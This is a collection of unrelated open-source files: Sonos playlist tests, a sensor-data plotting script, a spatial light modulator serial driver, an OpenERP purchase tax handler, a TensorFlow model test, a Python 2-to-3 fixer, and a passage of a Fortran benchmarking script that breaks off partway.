        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = sorted(range(num_tracks), reverse=True)
        new_pos = [None for _ in tracks]
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1 * num_tracks
        assert response["length"] == num_tracks + response["change"]
        assert response["length"] == 0
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        assert len(spl) == 0

    def test_reorder_and_remove_track(self, soco):
        """Test reorder and removing a track from Sonos Playlist."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = [1, 2]
        new_pos = [0, None]
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1
        assert response["length"] == num_tracks + response["change"]
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        que = soco.get_queue()
        assert spl[0].resources[0].uri == que[1].resources[0].uri

    def test_object_id_is_object(self, soco):
        """Test that a DidlPlaylistContainer object (not just an item_id
        string) is accepted for the sonos_playlist argument."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = sorted(range(num_tracks), reverse=True)
        new_pos = [None for _ in tracks]
        args = {"sonos_playlist": test_playlist, "tracks": tracks, "new_pos": new_pos}
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1 * num_tracks
        assert response["length"] == num_tracks + response["change"]
        assert response["length"] == 0
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        assert len(spl) == 0

    def test_remove_all_string(self, soco):
        """Remove all in one op by using strings."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        # we know what we are doing
        tracks = ",".join([str(x) for x in range(num_tracks)])
        new_pos = ""
        args = {"sonos_playlist": test_playlist, "tracks": tracks, "new_pos": new_pos}
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1 * num_tracks
        assert response["length"] == num_tracks + response["change"]
        assert response["length"] == 0
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        assert len(spl) == 0

    def test_remove_and_reorder_string(self, soco):
        """test remove then reorder using string arguments."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = "0,2"  # trackA, trackB, trackC, ...
        new_pos = ",0"  # trackC, trackB, ...
        args = {"sonos_playlist": test_playlist, "tracks": tracks, "new_pos": new_pos}
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == -1
        assert response["length"] == num_tracks + response["change"]
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        que = soco.get_queue()
        assert spl[0].resources[0].uri == que[2].resources[0].uri
        assert spl[1].resources[0].uri == que[1].resources[0].uri

    def test_move_track_string(self, soco):
        """Test a simple move with strings."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = "0"
        new_pos = "1"
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == 0
        assert response["length"] == num_tracks
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        que = soco.get_queue()
        assert spl[0].resources[0].uri == que[1].resources[0].uri
        assert spl[1].resources[0].uri == que[0].resources[0].uri
        # FIXME remove the list on spl and que before slicing, when
        # the deprecated __getitem__ on ListOfMusicInfoItems is
        # removed
        for s_item, q_item in zip(list(spl)[2:], list(que)[2:]):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_move_track_int(self, soco):
        """Test a simple move with ints."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        tracks = 1
        new_pos = 0
        args = {
            "sonos_playlist": test_playlist.item_id,
            "tracks": tracks,
            "new_pos": new_pos,
        }
        response = soco.reorder_sonos_playlist(**args)
        assert response["change"] == 0
        assert response["length"] == num_tracks
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        que = soco.get_queue()
        assert spl[0].resources[0].uri == que[1].resources[0].uri
        assert spl[1].resources[0].uri == que[0].resources[0].uri
        # FIXME remove the list on spl and que before slicing, when
        # the deprecated __getitem__ on ListOfMusicInfoItems is
        # removed
        for s_item, q_item in zip(list(spl)[2:], list(que)[2:]):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_clear_sonos_playlist(self, soco):
        """Test the clear_sonos_playlist helper function."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        response = soco.clear_sonos_playlist(test_playlist)
        assert response["change"] == -1 * num_tracks
        assert response["length"] == num_tracks + response["change"]
        assert response["length"] == 0
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        assert len(spl) == 0

    def test_clear_empty_sonos_playlist(self, soco):
        """Test clearing an already empty Sonos playlist."""
        test_playlist, _ = self._reset_spl_contents(soco)
        response = soco.clear_sonos_playlist(test_playlist)
        assert response["length"] == 0
        update_id = response["update_id"]
        # Clearing again (with the known update_id) must be a no-op.
        new_response = soco.clear_sonos_playlist(test_playlist, update_id=update_id)
        assert new_response["change"] == 0
        assert new_response["length"] == 0
        assert new_response["update_id"] == update_id

    def test_move_in_sonos_playlist(self, soco):
        """Test method move_in_sonos_playlist."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        args = {"sonos_playlist": test_playlist.item_id, "track": 0, "new_pos": 1}
        response = soco.move_in_sonos_playlist(**args)
        assert response["change"] == 0
        assert response["length"] == num_tracks
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        que = soco.get_queue()
        assert spl[0].resources[0].uri == que[1].resources[0].uri
        assert spl[1].resources[0].uri == que[0].resources[0].uri
        # FIXME remove the list on spl and que before slicing, when
        # the deprecated __getitem__ on ListOfMusicInfoItems is
        # removed
        for s_item, q_item in zip(list(spl)[2:], list(que)[2:]):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_remove_from_sonos_playlist(self, soco):
        """Test remove_from_sonos_playlist method."""
        test_playlist, num_tracks = self._reset_spl_contents(soco)
        args = {"sonos_playlist": test_playlist.item_id, "track": 0}
        response = soco.remove_from_sonos_playlist(**args)
        assert response["change"] == -1
        assert response["length"] == num_tracks - 1
        assert response["update_id"] != 0
        spl = soco.music_library.browse(ml_item=test_playlist)
        # FIXME remove the list on queue() call, when the deprecated
        # __getitem__ on ListOfMusicInfoItems is removed
        que = list(soco.get_queue())[1:]
        for s_item, q_item in zip(spl, que):
            assert s_item.resources[0].uri == q_item.resources[0].uri

    def test_get_sonos_playlist_by_attr(self, soco):
        """Test test_get_sonos_playlist_by_attr."""
        test_playlist, _ = self._reset_spl_contents(soco)
        by_name = soco.get_sonos_playlist_by_attr("title", self.playlist_name)
        assert test_playlist.item_id == by_name.item_id
        by_id = soco.get_sonos_playlist_by_attr("item_id", test_playlist.item_id)
        assert test_playlist.item_id == by_id.item_id
        # Unknown attribute names and unmatched values raise distinct errors.
        with pytest.raises(AttributeError):
            soco.get_sonos_playlist_by_attr("fred", "wilma")
        with pytest.raises(ValueError):
            soco.get_sonos_playlist_by_attr("item_id", "wilma")
class TestMusicLibrary(object):
    """Tests for the music library search methods."""

    search_types = list(MusicLibrary.SEARCH_TRANSLATION.keys())
    specific_search_methods = (
        "artists",
        "album_artists",
        "albums",
        "genres",
        "composers",
        "tracks",
        "playlists",
        "sonos_favorites",
        "favorite_radio_stations",
        "favorite_radio_shows",
    )

    @pytest.mark.parametrize("search_type", specific_search_methods)
    def test_from_specific_search_methods(self, soco, search_type):
        """Each get_<category> convenience method returns a SearchResult."""
        search_method = getattr(soco.music_library, "get_" + search_type)
        assert isinstance(search_method(), SearchResult)

    @pytest.mark.parametrize("search_type", search_types)
    def test_music_library_information(self, soco, search_type):
        """get_music_library_information returns a SearchResult for every
        supported search type."""
        result = soco.music_library.get_music_library_information(search_type)
        assert isinstance(result, SearchResult)
| mit |
Debaq/Triada | FullAxis_GUI/DB/BASE DE DATOS EXPERIMENTO/experimento 3/gaby hernandez/medidor3.py | 27 | 3052 | import argparse
import sys
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
import numpy as np
import json
# Command-line interface: the single positional argument is the path of the
# JSON recording to load and trim.
parser = argparse.ArgumentParser(description="Does some awesome things.")
parser.add_argument('message', type=str, help="pass a message into the script")
args = parser.parse_args(sys.argv[1:])
# Module-level state shared by graph()/corte()/reset_tempo() below.
data = []      # full recording loaded from the JSON file (dict of channel lists)
New_data = []  # trimmed recording produced by corte()
dt = []        # trimmed time axis re-based to start at zero
with open(args.message) as json_file:
    data = json.load(json_file)
def graph(grid, d_tiempo):
    """Plot pitch/roll/yaw and the LED traces against the time axis *d_tiempo*.

    grid == 1 selects the trimmed ``New_data`` channels; any other value
    plots the original ``data`` channels.  Reads the module-level globals
    ``data``, ``New_data`` and ``args``; blocks until the window is closed.
    """
    plt.switch_backend('TkAgg')  # default on my system
    f = plt.figure(num=args.message, figsize=(20, 15))
    # NOTE(review): this manager lookup is immediately overwritten below and
    # the print looks like a leftover debug statement.
    mng = plt._pylab_helpers.Gcf.figs.get(f.number, None)
    print(New_data)
    # Maximize the window before plotting.
    mng = plt.get_current_fig_manager()
    mng.resize(*mng.window.maxsize())
    plt.title(args.message)
    if grid == 1:
        # NOTE(review): tempo_init/tempo_end are computed but never used.
        tempo = d_tiempo
        tempo_init = tempo[0]
        tempo_end = tempo[-1]
    # Four stacked subplots: pitch, roll, yaw, LEDs.
    gs1 = GridSpec(4, 1)
    gs1.update(left=0.05, right=0.95, wspace=0.5, hspace=0.3, bottom=0.08)
    # Row 1: pitch.
    ax1 = plt.subplot(gs1[0, :])
    ax1.grid()
    ax1.set_ylabel('Pitch', fontsize=8)
    if grid == 1:
        L1 = ax1.plot(d_tiempo, New_data['pitch'])
    else:
        L1 = ax1.plot(d_tiempo, data['pitch'])
    # Row 2: roll.
    ax2 = plt.subplot(gs1[1, :])
    ax2.grid()
    ax2.set_ylabel('Roll', fontsize=8)
    if grid == 1:
        L1 = ax2.plot(d_tiempo, New_data['roll'])
    else:
        L1 = ax2.plot(d_tiempo, data['roll'])
    # Row 3: yaw.
    ax3 = plt.subplot(gs1[2, :])
    ax3.grid()
    ax3.set_ylabel('Yaw', fontsize=8)
    if grid == 1:
        L1 = ax3.plot(d_tiempo, New_data['yaw'])
    else:
        L1 = ax3.plot(d_tiempo, data['yaw'])
    # Row 4: LED traces (blue and red) -- note the y-label says 'Tiempo'.
    ax4 = plt.subplot(gs1[3, :])
    ax4.grid()
    ax4.set_ylabel('Tiempo', fontsize=8)
    if grid == 1:
        L1 = ax4.plot(d_tiempo, New_data['ledblue'])
        L2 = ax4.plot(d_tiempo, New_data['ledred'])
    else:
        L1 = ax4.plot(d_tiempo, data['ledblue'])
        L2 = ax4.plot(d_tiempo, data['ledred'])
    plt.show()
def find_nearest(array, values):
    """Return the index (or indices) in *array* of the element closest to
    each entry of *values* (scalar values give a scalar index)."""
    distances = np.abs(np.subtract.outer(array, values))
    return distances.argmin(0)
def corte(init_cut, end_cut, a, b, c, d, e, f, g, h, i):
    """Slice every channel of the recording to [init_cut:end_cut].

    The positional order matches the single call site in this script:
    pitch, roll, yaw, X, Y, Z, time, ledblue, ledred.  Returns a dict
    keyed by channel name.

    FIX: the original mapped a -> 'roll' and b -> 'pitch', while the call
    site passes data['pitch'] first, so the pitch and roll channels were
    swapped in the returned dict (and in every subsequent plot).
    """
    channels = ('pitch', 'roll', 'yaw', 'X', 'Y', 'Z', 'time',
                'ledblue', 'ledred')
    series = (a, b, c, d, e, f, g, h, i)
    return {name: values[init_cut:end_cut]
            for name, values in zip(channels, series)}
def reset_tempo(var_in, var_out):
    """Append to *var_out* the timestamps of *var_in* re-based so the first
    sample is 0 (rounded to 3 decimals); returns *var_out*."""
    origin = var_in[0]
    var_out.extend(round(t - origin, 3) for t in var_in)
    return var_out
# Show the full recording first so the user can pick the cut window.
graph(0, data['time'])
# Ask for the trim window (in seconds) and map each bound to the index of
# the nearest time sample.
init_cut = float(input("tiempo inicial: "))
init_cuty = find_nearest(data['time'], init_cut)
end_cut = float(input("tiempo final: "))
end_cuty = find_nearest(data['time'], end_cut)
# Slice every channel down to the selected window.
New_data = corte(init_cuty, end_cuty, data['pitch'], data['roll'], data['yaw'], data['X'], data['Y'], data['Z'], data['time'], data['ledblue'], data['ledred'])
data = []
print(data)
# Replace the full recording with the trimmed one (prints look like debug
# leftovers: first an empty list, then the trimmed dict).
data = New_data
print(data)
# Re-base the trimmed time axis to start at zero and plot the result.
dt = reset_tempo(New_data['time'], dt)
graph(0, dt)
| gpl-3.0 |
imrehg/labhardware | projects/slm/cri_slm.py | 2 | 3677 | #!/usr/bin/env python
# USB Serial support for CRI Spatial Light Modulator
#
import serial
import os
class SLM:
    """
    Spatial Light Modulator

    Serial (USB) interface to a CRI spatial light modulator.  Commands are
    single letters (M, F, E, D, B, V, P, C), optionally followed by a value,
    terminated by carriage return.  Python 2 code (xrange, byte strings,
    old pyserial readline(eol=...) API).
    """
    def __init__(self, serialport=None):
        """ Create motor controller serial interface
        Input:
        serialport : name of the serial port (eg. '/dev/ttyUSB0' or 'COM1')

        If serialport is None, COM1..COM19 (Windows) or /dev/ttyUSB0..19
        (elsewhere) are probed until a device answers a version query.
        """
        self.termchar = "\r"
        if (serialport is None):
            # Pick the platform's serial port naming scheme for probing.
            if (os.name == 'nt'):
                serialbase = "COM"
                serialnumstart = 1
            else:
                serialbase = "/dev/ttyUSB"
                serialnumstart = 0
            for i in xrange(serialnumstart, 20):
                serialport = "%s%d" %(serialbase,i)
                self.iface = self.__connectport(serialport)
                # A port only counts if it opens AND answers a version query.
                if not (self.iface is None) and self.getversion():
                    break
        else:
            self.iface = self.__connectport(serialport)
        if self.iface is None:
            print("Not connected...")
        else:
            print("Spatial Light Modulator connected on %s" %(serialport))
        # Device geometry/limits: masks, frames, elements per frame, and the
        # maximum element value (12-bit range).
        self._NMask = 2
        self._NFrame = 128
        self._NElement = 128
        self._MaxValue = 4096

    def __connectport(self, serialport):
        """Try to open *serialport*; return the Serial object, or None on
        any failure (port absent, busy, permissions, ...)."""
        try:
            iface = serial.Serial(serialport, baudrate=460800, bytesize=8, \
                                  stopbits=1, parity=serial.PARITY_NONE, \
                                  timeout=10, xonxoff=0, rtscts=0, dsrdtr=0)
        except:
            iface = None
        return iface

    def set(self, command):
        """ Send command to controller, and read answer if there's any
        For correct behaviour, it seems we have to read at least one line
        """
        self.iface.write(command+self.termchar)
        self.iface.readline(eol=self.termchar)

    def query(self, command):
        """Send *command* and return the device's next reply line, stripped."""
        self.set(command)
        resp = self.iface.readline(eol=self.termchar).strip()
        return resp

    def _cmdproto(self, target, command):
        """Shared protocol helper for the single-letter commands.

        If command == '?', queries *target* and returns the integer value
        from the reply's second field (None on any parse/communication
        failure).  Otherwise *command* is converted to int and sent as
        "<target> <value>"; non-numeric values are silently ignored.
        """
        if command == '?':
            try:
                answer = int(self.query(target+command).split()[1])
            except:
                answer = None
            return answer
        else:
            try:
                c = int(command)
                self.set("%s %d" %(target, c))
            except:
                pass
            finally:
                # NOTE(review): returning from finally also swallows any
                # exception raised above -- presumably intentional (best
                # effort set), but worth confirming.
                return

    def blockquery(self):
        """Read all element values in one block ('B?').

        Returns a list of self._NElement integers decoded from consecutive
        little-endian 16-bit pairs (low byte first).
        """
        self.set("B?")
        r = self.iface.read(self._NElement*2)
        values = []
        for i in xrange(0,self._NElement*2,2):
            values.append(ord(r[i+1])*256 + ord(r[i]))
        return values

    def blockset(self, values):
        """Write all element values in one block ('B1').

        Returns 0 on success, 1 if *values* does not contain exactly
        self._NElement entries.
        """
        if len(values) <> self._NElement:
            return(1)
        out = ""
        for i in range(self._NElement):
            # Little-endian 16-bit encoding: low byte, then high byte.
            out += chr(int(values[i]%256))+chr(int(values[i]/256))
        self.set("B1")
        self.iface.write(out)
        return(0)

    def cmdmask(self, command):
        """Query ('?') or set the active mask ('M' command)."""
        return self._cmdproto('M', command)

    def cmdframe(self, command):
        """Query ('?') or set the active frame ('F' command)."""
        return self._cmdproto('F', command)

    def cmdelement(self, command):
        """Query ('?') or set the active element ('E' command)."""
        return self._cmdproto('E', command)

    def cmdvalue(self, command):
        """Query ('?') or set the element value ('D' command)."""
        return self._cmdproto('D', command)

    def maxmask(self):
        """Return the number of masks supported by the device."""
        return self._NMask

    def maxframe(self):
        """Return the number of frames supported by the device."""
        return self._NFrame

    def maxelement(self):
        """Return the number of elements per frame."""
        return self._NElement

    def maxvalue(self):
        """Return the maximum element value."""
        return self._MaxValue

    def clearframe(self):
        """Clear the current frame ('C 1' command)."""
        self.set("C 1")

    def activeframe(self, frame):
        """Make *frame* the active frame ('P' command)."""
        self.set("P %d" %frame)

    def getversion(self):
        """Query the firmware version ('V?'); None if the device does not
        answer with a parsable value."""
        return self._cmdproto('V', '?')
| mit |
yvaucher/purchase-workflow | __unported__/purchase_fiscal_position_update/purchase.py | 4 | 3820 | # -*- coding: utf-8 -*-
#############################################################################
#
# Purchase Fiscal Position Update module for OpenERP
# Copyright (C) 2011-2014 Julius Network Solutions SARL <contact@julius.fr>
# Copyright (C) 2014 Akretion (http://www.akretion.com)
# @author Mathieu Vatel <mathieu _at_ julius.fr>
# @author Alexis de Lattre <alexis.delattre@akretion.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm
from openerp.tools.translate import _
class purchase_order(orm.Model):
    """Extends purchase.order with an on_change handler that remaps line
    taxes when the fiscal position changes."""
    _inherit = "purchase.order"

    def fiscal_position_change(
            self, cr, uid, ids, fiscal_position, order_line,
            context=None):
        '''Function executed by the on_change on the fiscal_position field
        of a purchase order ; it updates taxes on all order lines.

        Returns the usual on_change dict: res['value']['order_line'] holds
        the rewritten lines; res['warning'] is set when some lines could
        not be updated because they have no product.
        '''
        assert len(ids) in (0, 1), 'One ID max'
        fp_obj = self.pool['account.fiscal.position']
        res = {}
        line_dict = self.resolve_2many_commands(
            cr, uid, 'order_line', order_line, context=context)
        lines_without_product = []
        if fiscal_position:
            fp = fp_obj.browse(cr, uid, fiscal_position, context=context)
        else:
            fp = False
        for line in line_dict:
            # Reformat line_dict so as to be compatible with what is
            # accepted in res['value']: many2one values come back as
            # (id, name) tuples and must be collapsed to the id.
            for key, value in line.iteritems():
                if isinstance(value, tuple) and len(value) == 2:
                    line[key] = value[0]
            if line.get('product_id'):
                product = self.pool['product.product'].browse(
                    cr, uid, line.get('product_id'), context=context)
                taxes = product.supplier_taxes_id
                tax_ids = fp_obj.map_tax(
                    cr, uid, fp, taxes, context=context)
                # (6, 0, ids) replaces the line's taxes wholesale.
                line['taxes_id'] = [(6, 0, tax_ids)]
            else:
                lines_without_product.append(line.get('name'))
        res['value'] = {}
        res['value']['order_line'] = line_dict
        if lines_without_product:
            res['warning'] = {'title': _('Warning')}
            if len(lines_without_product) == len(line_dict):
                res['warning']['message'] = _(
                    "The Purchase Order Lines were not updated to the new "
                    "Fiscal Position because they don't have Products.\n"
                    "You should update the Taxes of each "
                    "Purchase Order Line manually.")
            else:
                display_line_names = ''
                for name in lines_without_product:
                    display_line_names += "- %s\n" % name
                # FIX: the original statement ended with a trailing comma,
                # which made the warning message a 1-element tuple instead
                # of a string.
                res['warning']['message'] = _(
                    "The following Purchase Order Lines were not updated "
                    "to the new Fiscal Position because they don't have a "
                    "Product:\n %s\nYou should update the "
                    "Taxes of these Purchase Order Lines manually."
                    ) % display_line_names
        return res
| agpl-3.0 |
derekjchow/models | research/compression/entropy_coder/all_models/all_models_test.py | 14 | 2447 | # Copyright 2017 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Basic test of all registered models."""
import tensorflow as tf
# pylint: disable=unused-import
import all_models
# pylint: enable=unused-import
from entropy_coder.model import model_factory
class AllModelsTest(tf.test.TestCase):
    """Smoke test: every registered model must build a training graph with
    its default (unit-test) configuration."""

    def testBuildModelForTraining(self):
        factory = model_factory.GetModelRegistry()
        for model_name in factory.GetAvailableModels():
            # Each model gets its own clean graph.
            tf.reset_default_graph()
            global_step = tf.Variable(tf.zeros([], dtype=tf.int64),
                                      trainable=False,
                                      name='global_step')
            optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)
            # Dummy binary-code input: [batch, height, width, depth].
            input_shape = [3, 40, 20, 5]
            binary_codes = tf.placeholder(dtype=tf.float32, shape=input_shape)
            # Create a model with the default configuration.
            print('Creating model: {}'.format(model_name))
            model = factory.CreateModel(model_name)
            model.Initialize(global_step,
                             optimizer,
                             model.GetConfigStringForUnitTest())
            # Nothing should exist before BuildGraph() is called.
            self.assertTrue(model.loss is None, 'model: {}'.format(model_name))
            self.assertTrue(model.train_op is None, 'model: {}'.format(model_name))
            self.assertTrue(model.average_code_length is None,
                            'model: {}'.format(model_name))
            # Build the Tensorflow graph corresponding to the model.
            model.BuildGraph(binary_codes)
            self.assertTrue(model.loss is not None, 'model: {}'.format(model_name))
            self.assertTrue(model.average_code_length is not None,
                            'model: {}'.format(model_name))
            if model.train_op is None:
                print('Model {} is not trainable'.format(model_name))
# Run the test suite when executed directly.
if __name__ == '__main__':
    tf.test.main()
| apache-2.0 |
jacegem/lotto-store | lib/libfuturize/fixes/fix_future_builtins.py | 62 | 2028 | """
For the ``future`` package.
Adds this import line::
from builtins import XYZ
for each of the functions XYZ that is used in the module.
Adds these imports after any other imports (in an initial block of them).
"""
from __future__ import unicode_literals
from lib2to3 import fixer_base
from lib2to3.pygram import python_symbols as syms
from lib2to3.fixer_util import Name, Call, in_special_context
from libfuturize.fixer_util import touch_import_top
# All builtins provided by the ``future`` package are:
# from future.builtins.iterators import (filter, map, zip)
# from future.builtins.misc import (ascii, chr, hex, input, isinstance, oct, open, round, super)
# from future.types import (bytes, dict, int, range, str)
# We don't need isinstance any more.

# Names whose call sites should trigger a ``from builtins import <name>``.
replaced_builtin_fns = '''filter map zip
ascii chr hex input next oct
bytes range str raw_input'''.split()
# This includes raw_input as a workaround for the
# lib2to3 fixer for raw_input on Py3 (only), allowing
# the correct import to be included. (Py3 seems to run
# the fixers the wrong way around, perhaps ignoring the
# run_order class attribute below ...)

# lib2to3 pattern alternation matching a call to any of the names above.
expression = '|'.join(["name='{0}'".format(name) for name in replaced_builtin_fns])
class FixFutureBuiltins(fixer_base.BaseFix):
    """lib2to3 fixer that adds ``from builtins import <name>`` for each
    replaced builtin the module actually calls."""
    BM_compatible = True
    run_order = 7

    # Only call sites are matched (e.g. ``chr(i)``); bare references such
    # as ``isinstance(s, str)`` are left alone.
    PATTERN = """
              power<
                 ({0}) trailer< '(' [arglist=any] ')' >
              rest=any* >
              |
              power<
                  'map' trailer< '(' [arglist=any] ')' >
              >
              """.format(expression)

    def transform(self, node, results):
        # Ensure the matching ``from builtins import <name>`` line exists at
        # the top of the module; the call site itself is left untouched.
        matched_name = results["name"]
        touch_import_top(u'builtins', matched_name.value, node)
sniemi/SamPy | sandbox/src1/TCSE3-3rd-examples/src/app/wavesim2D/F77/autoedit.py | 1 | 5475 | #!/usr/bin/env python
# automatic execution of HPC exercises
import shutil, sys, os, re, glob
counter = 0  # numbers the snapshot copies written by edit()
def edit(from_to, filename='F77WAVE.fcp'):
    """
    substitute (from,to) in from_to list, e.g.
    edit((r'from',r'to'))

    The pristine copy <filename>.orig is restored first, the substitutions
    are applied, and a numbered snapshot <filename><counter> is kept.
    """
    # Always start from the pristine copy of the file.
    shutil.copy(filename + ".orig", filename)
    with open(filename, 'r') as infile:
        text = infile.read()
    # Apply each regex substitution in turn (multi-line mode).
    for pattern, replacement in from_to:
        text = re.compile(pattern, re.MULTILINE).sub(replacement, text)
    with open(filename, 'w') as outfile:
        outfile.write(text)
    # Keep a numbered snapshot of this edited version for inspection.
    global counter
    shutil.copy(filename, filename + str(counter))
    counter += 1
def compile(compiler, options):
    """Preprocess F77WAVE.fcp and build the 'app' executable with -pg so
    that gprof can profile the run.  (Name shadows the builtin compile.)"""
    # run the C preprocessor on F77WAVE.fcp to create F77WAVE.f:
    os.system("./fcpp.py F77WAVE.fcp")
    # compile and link:
    cmd = "%s %s -pg -o app F77WAVE.f main.f" % (compiler, options)
    print(cmd)
    os.system(cmd)
def write_results(message, file):
    """Append a profiling report for the last run to *file* and return the
    CPU time gprof attributes to MAIN__.

    (Python 2 code; the parameter name *file* shadows the py2 builtin but
    is kept for interface compatibility.)
    """
    file.write("\n\n-----------------------------------------------\n")
    file.write(">>>> " + message + "\n")
    # extract table from the output of gprof
    res = os.popen("gprof app")
    lines = res.readlines()
    res.close()
    # grab the flat-profile table between its header and the legend line:
    m = re.search(r"(\% cumulative.*)\%\s+the percentage of the total",
                  ''.join(lines), re.DOTALL)
    if m:
        table = m.group(1)
        file.write(table)
    # write the current version F77WAVE.f:
    f = open('F77WAVE.f', 'r'); filestr = f.read(); f.close()
    file.write("\n*** current version of F77WAVE.f ***\n")
    file.write(filestr)
    file.write("************\n\n")
    # extract CPU time and return
    # NOTE(review): if gprof's output has no line ending in MAIN__,
    # cpu_time is never bound and the print below raises NameError --
    # presumably the g77 main program always appears; verify.
    for line in lines:
        if re.search(r"MAIN__$", line):
            cpu_time = float(line.split()[1])
            break
    print message, cpu_time, "sec"
    return cpu_time
def run():
    """Execute the compiled 'app' binary; its output goes to the terminal
    (append '> /dev/null' to the command to silence the solver)."""
    os.system("app")
def test_IO(compiler, options):
    """Time the solver with I/O enabled (the 'call dump' lines uncommented)."""
    message = "with I/O (call dump)"
    # Turn the Fortran comment marker 'C' into whitespace, re-enabling dump.
    edit(((r"^C(\s+)call dump", r" \1call dump"),), filename="main.f")
    compile(compiler, options)
    run()
    compactresults.append((message, write_results(message, resultfile)))
    # Restore the pristine sources for the next experiment.
    shutil.copy('main.f.orig', 'main.f')
    shutil.copy('F77WAVE.fcp.orig', 'F77WAVE.fcp')
    # Remove the (potentially large) dump files produced by the run.
    for tmpname in glob.glob('tmp_*'):
        os.remove(tmpname)
def test_Olevels(compiler, options):
    """Time the solver at optimization levels -O0 through -O3."""
    for level in range(4):
        message = "with optimization level -O%d" % level
        compile(compiler, options + " -O%d " % level)
        run()
        compactresults.append((message, write_results(message, resultfile)))
def test_loop_unrolling(compiler, options):
    """Time the solver with compiler-driven loop unrolling enabled."""
    message = "loop unrolling (by the compiler)"
    compile(compiler, options + " -funroll-loops ")
    run()
    compactresults.append((message, write_results(message, resultfile)))
def test_swap_loops(compiler, options):
    """Time the solver with the i/j loops interchanged so that the arrays
    are traversed column by column (Fortran's natural storage order)."""
    message = "traverse arrays column by column"
    edit(((r"DO 20 j = 2, ny-1", r"DO 20 i = 2, nx-1"),
          (r"DO 10 i = 2, nx-1", r"DO 10 j = 2, ny-1")))
    compile(compiler, options)
    run()
    compactresults.append((message, write_results(message, resultfile)))
def test_callfunc1(compiler, options):
    """Time the solver with the lambda(i,j) array lookup replaced by a
    constant-argument function call h(0,0)."""
    message = "lambda(i,j) replaced by function call h(0,0)"
    edit(((r"lambda\(([^,]+),([^)]+)\)", r"h(0,0)"),
          (r"REAL\*8 a, b, c", r"REAL*8 a, b, c, h"),
          (r", h\(0,0\)", r"")))
    compile(compiler, options)
    run()
    compactresults.append((message, write_results(message, resultfile)))
def test_callfunc2(compiler, options):
    """Time the solver with lambda(i,j) replaced by a coordinate-based
    function call h((i-1)*delta,(j-1)*delta)."""
    message = "lambda(i,j) replaced by function call h((i-1)*delta,(j-1)*delta)"
    edit(((r"lambda\(([^,]+),([^)]+)\)", r"h((\1 -1)*delta,(\2 -1)*delta)"),
          (r"REAL\*8 a, b, c", r"REAL*8 a, b, c, h, delta"),
          (r"INTEGER i,j", r"INTEGER i,j\n delta = 10.0/(nx-1)"),
          (r", h\(\(nx .*$", r"")))
    compile(compiler, options)
    run()
    compactresults.append((message, write_results(message, resultfile)))
def test_iftests_in_loops(compiler, options):
    # Benchmark with the loop bounds widened to the full grid and an if-test
    # inside the loop body guarding the interior points instead.
    message = "if-tests inside loops"
    edit(((r"DO 20 j = 2, ny-1", r"DO 20 j = 1, ny"),
          (r"DO 10 i = 2, nx-1", r"DO 10 i = 1, nx\n if (i .ge. 2 .and. i .le. nx-1 .and. j .ge. 2 \n > .and. j .le. ny-1) then"),
          (r"10 CONTINUE", r" end if\n 10 CONTINUE")))
    compile(compiler, options)
    run()
    cpu = write_results(message, resultfile)
    compactresults.append((message, cpu))
#---------------------------------------------------------------------------
# run exercises:
# NOTE: this driver is Python 2 code (see the print statements below).
resultfile = open('results', 'w')
compactresults = []  # (description, cpu_time) pairs for the summary table
# make sure we start with the right files:
shutil.copy('main.f.orig', 'main.f')
shutil.copy('F77WAVE.fcp.orig', 'F77WAVE.fcp')
#print "test1:"
#test_iftests_in_loops('g77', '-O3')
#sys.exit(1)
# the benchmark variants to run, in this order:
tests = [test_IO, test_Olevels, test_loop_unrolling,
